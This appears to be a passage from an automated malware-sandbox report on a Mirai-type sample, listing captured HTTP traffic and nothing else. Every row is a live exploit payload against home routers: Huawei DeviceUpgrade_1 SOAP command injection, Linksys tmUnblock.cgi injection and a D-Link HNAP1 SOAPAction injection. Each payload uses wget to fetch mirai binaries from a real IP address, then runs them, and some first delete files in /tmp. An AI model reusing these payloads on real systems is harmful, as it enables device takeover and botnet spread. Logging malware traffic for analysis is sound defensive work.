| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
